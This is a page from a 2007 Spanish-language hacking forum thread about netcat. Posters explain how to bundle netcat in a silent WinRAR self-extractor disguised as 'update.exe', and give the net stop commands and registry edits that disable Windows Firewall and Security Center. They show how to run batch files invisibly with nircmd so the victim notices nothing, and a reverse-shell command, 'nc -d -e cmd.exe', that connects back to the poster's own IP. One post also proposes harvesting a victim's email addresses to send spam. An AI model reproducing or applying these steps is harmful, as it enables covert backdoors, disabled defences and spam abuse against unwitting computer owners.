elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 355,482 veces)
marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #120 en: 2 Junio 2007, 08:37 am »

my friend :(

hice todo a la perfeccion (creo)xD  y me dice que no es una aplicacion win32 valida :S


ya lo intente desde cero 3 veces y sigue el mismo error :S


y donde ingreso estos comandos? :S

net stop  "Centro de seguridad"

net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"

Supongo que esto es un bat, lo comprimo junto con el netcat con winrar y lo pongo en comentario ?
reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /f

Salu2
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #121 en: 2 Junio 2007, 16:37 pm »

Mmm...Cuando creas un SFX en WinRar el comentario no se toca ya que tiene el script SFX para la descompresión. Lo de net stop son comandos para la consola, los pones en un bat.
Para hacer todo junto podes crear el sfx (yo los creo siempre en formato zip que me parece mas simple), vas a la solapa de avanzadas > opciones del SFX, configuras todo a gusto y pones aceptar...ahora en la solapa comment te tendría que aparecer algo como.
Código:
;The comment below contains SFX script commands

Path=TOK
Setup=TOK.bat
Overwrite=1
Title=Instalar
Text
{
Seleccione la carpeta desde la que se ejecutara Trash Over Killer
}
Shortcut=P, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"
Shortcut=D, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"

Ese es para un antiWorm que estoy desarrollando. Fijate que crea dos shortcuts, tiene un texto y lo de Setup=TOK.bat es la parte que va a ejecutar el TOK.bat cuando se termine la descompresion. Si en la parte de modos usas el modo silencioso no tiene dialogo asi que vas a ver que ese TOK.bat (eso para mi caso) se ejecuta solito, ya que la descompresion se hizo sin decir nada...
Podes desde el mismo bat hacer todo junto...pero en general a mi me gusta mandar tambien NirCmd en el paquete y usar dos bats, uno llama al otro con nircmd execmd que es una orden para ejecutar lo que le pedimos sin mostrar nada. Hay una forma de hacerlo sin Nir (en cmd), pero no me la acuerdo... ;D
Bueno, lo que obtenes mandando el paquete con nir, nc y esos dos bats es la posibilidad de que el segundo bat se ejecute sin mostrar nada de nada...asi que podes hacer cositas que lleven tiempo y el usuario no podra notarlo, a menos que hagas cosas que requieran trabajo, en ese caso el usuario puede notar que su pc esta haciendo algo. Pero si logras meter NetCat haces un scan de las direcciones de E-Mail, las mandas a un txt y despues usas ese txt desde netcat para enviar correos, o lo que quieras!!! Es mucho lo que se puede hacer si lograste meter todo, y si el bat se ejecuta en silencio significa que le podes escanear practicamente toda la maquina, ya que eso no hace mucho alarde...jeje ;D
En línea

OpenBSDFreeBSD
D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #122 en: 2 Junio 2007, 16:50 pm »

A ver, mejor me explico porque lo lei y no se entiende nada...
Uno de los bats (pongamosle run.bat) tiene que decir:

Código:
echo off
color FE
nircmd execmd runme.bat
exit

Obviamente vas a tener otro llamado runme.bat que metera netcat, y hara todo el lio sin mostrar nada. Tambien deberas incluir en ese caso el nircmd. Yo lo suelo renombrar como algo mas creativo como nir o com...jeje En ese caso el comando debe ser nir execmd runme.bat o com execmd runme.bat.
El otro tendra algo como

Código:
net stop sharedaccess
net stop "Centro de Seguridad"
net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
...

Y blablabla todos los que quieras...total el usuario no lo ve.
En línea

OpenBSDFreeBSD
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #123 en: 3 Junio 2007, 01:48 am »

No es necesario crear archivos bats si puedes crear multiejecuciones en SFX  ;D

Path=TOK
Setup=cmd /c net stop sharedaccess&&net stop sharedaccess&&net stop "Centro de Seguridad"&&net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"&&net stop "Windows Firewall/Internet Connection Sharing (ICS)"


O

Path=%windir%
Setup=net stop sharedaccess
Setup=net stop sharedaccess&&net stop "Centro de Seguridad"
Setup=net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"
Setup=net stop "Windows Firewall/Internet Connection Sharing (ICS)"
etc etc...

De todas maneras hace un poco de tiempo hice un programa para ejecutar bats sin que se vea la consola de comandos.
http://512.iespana.es/nc
Busca el programa llamado bgr.rar y descomprimelo... luego escribe en el texto llamado ejecutar.txt el nombre y la ruta del bat y lixto, ahora solo ejecutas el ejecute_invisible.exe
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #124 en: 3 Junio 2007, 02:39 am »

Bueno si vamos al caso tambien podemos hacer un vbs pero me parecio que trabajar con lo de siempre es mas comodo...me sale el vago de adentro. Por cierto, intente mandar un mail desde nc con lo de type mjeberreta.txt|nc -vv -w 10 mail.speedy.com.ar 25...el tema es que me saca un error. Use como smtp el mail.speedy.com.ar que es el que mi viejo usa en el outlook como correo de salida. No se porque me pone estos errores:

220 galga.terra.com ESMTP
503 <Anonimo>: Helo command rejected: Improper use of SMTP command pipelining
503 Error: send HELO/EHLO first
503 Error: need MAIL command
503 Error: need RCPT command
221 Error: I can break rules, too. Goodbye.

no cazo porque???
En línea

OpenBSDFreeBSD
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #125 en: 3 Junio 2007, 02:50 am »

Escribe tu mjeberreta.txt, además no puedes enviar correos anonimamente o sin usar una contraseña en servidores como timonfonika, hotmail, yahoo, etc etc... por eso utilizé el miniremailer como servidor SMTP... ahora puedes usar un miniremailer para consola si quieres enviarlos directamente desde una makina remota  :P
Usa el miniremailer directamente desde http://512.iespana.es/nc
Nota: en un tiempo mas cambiaré los links directamente para que no sigan diciendo que mi post es SPAM para promocionar mi web ya que ni si quiera está terminada como para querer generar visitas :P.
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #126 en: 3 Junio 2007, 06:07 am »

Grax...me imagine que seria por algo de eso, y por tu pag, el reshack no lo puedo descargar...y no te hagas problema porque no este terminada, iespana tiene esa forma fea de publicar subiendo los ficheros desde la PC...¬¬...me gustaba mas la forma que ofrece zerocatch de modificar los documentos html manualmente desde el mismo servidor. Yo tengo estancado un link en mi web, ya que saque una nueva herramientita para limpiarse de algunas infecciones, y todavia no la reemplace, deje el link ahi nomas...jeje
Por cierto, leí por ahi que estabas compilando una nueva de netcat... :rolleyes: se me ocurre compilar un servernc.exe como servidor y un clientnc.exe como cliente...ahora me estoy fijando como llegar a hacerlo, pero no ando con mucho tiempo. Probablemente me fije como mejorar las características de servidor de nc...
Bueno, gracias por la rta XDXD   see you later man!
En línea

OpenBSDFreeBSD
marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #127 en: 4 Junio 2007, 00:48 am »

my frien respondo para que sepas que aun sigo intentandolo xD
aunque me sigue mandando aplicacion win32 no valida  :xD

bueno seguire buscandole
salu2
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #128 en: 4 Junio 2007, 04:18 am »

Usa este directamente:
http://www.vulnwatch.org/netcat/nc111nt.zip y desactiva tu antivirus antes de usarlo.
Si aun no puedes usarlo entonces tu pc tiene problemas y eso Debes plantearlo en otro subforo  :-\
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #129 en: 5 Junio 2007, 04:56 am »

A ver, otra vez yo...estuve probandocon el minirelay y logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa. No puede ser que esté baneado por bomber ni nada de eso, hice ping y responde, pero me sigue rebotando los Mails.

Y otra cosa. Uso speedy y me brinda una IP dinámica. Si quiero hacer que una Máquina remota se conecte a mi PC cada tanto, yo escribo:

nc -d -e cmd.exe miip 3000

cosa que crearía una inversa por el puerto 3000, el problema es que mi IP cambia cada vez que me conecto ¿Es lo mismo si uso el nombre de mi equipo? (Pregunto como para no ponerme a probar...XD)
En línea

OpenBSDFreeBSD
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines